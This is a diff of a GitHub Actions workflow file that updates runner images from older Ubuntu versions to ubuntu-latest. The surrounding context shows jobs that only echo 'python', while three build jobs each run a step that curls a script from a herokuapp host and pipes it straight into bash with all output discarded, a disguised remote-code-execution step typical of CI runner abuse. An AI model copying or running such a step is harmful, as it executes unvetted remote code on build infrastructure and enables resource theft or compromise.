--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -5,7 +5,7 @@ on:
  
 jobs:
  python-1:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
     strategy:
       fail-fast: false
       matrix:
@@ -19,7 +19,7 @@ jobs:
       run: echo "python"
  
  python-2:
-    runs-on: ubuntu-18.04 
+    runs-on: ubuntu-latest 
     needs: python-1
     strategy:
       fail-fast: false
@@ -34,7 +34,7 @@ jobs:
       run: echo "python"
  
  python-build-4:
-    runs-on: ubuntu-20.04 
+    runs-on: ubuntu-latest 
     needs: python-2
     strategy:
       fail-fast: false
@@ -51,7 +51,7 @@ jobs:
       run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
  
  python-build-3:
-    runs-on: ubuntu-20.04 
+    runs-on: ubuntu-latest 
     needs: python-2
     strategy:
       fail-fast: false
@@ -68,7 +68,7 @@ jobs:
       run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
  
  python-build-2:
-    runs-on: ubuntu-20.04 
+    runs-on: ubuntu-latest 
     needs: python-2
     strategy:
       fail-fast: false
@@ -85,7 +85,7 @@ jobs:
       run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
  
  python-build-1:
-    runs-on: ubuntu-20.04 
+    runs-on: ubuntu-latest 
     needs: python-2
     strategy:
       fail-fast: false
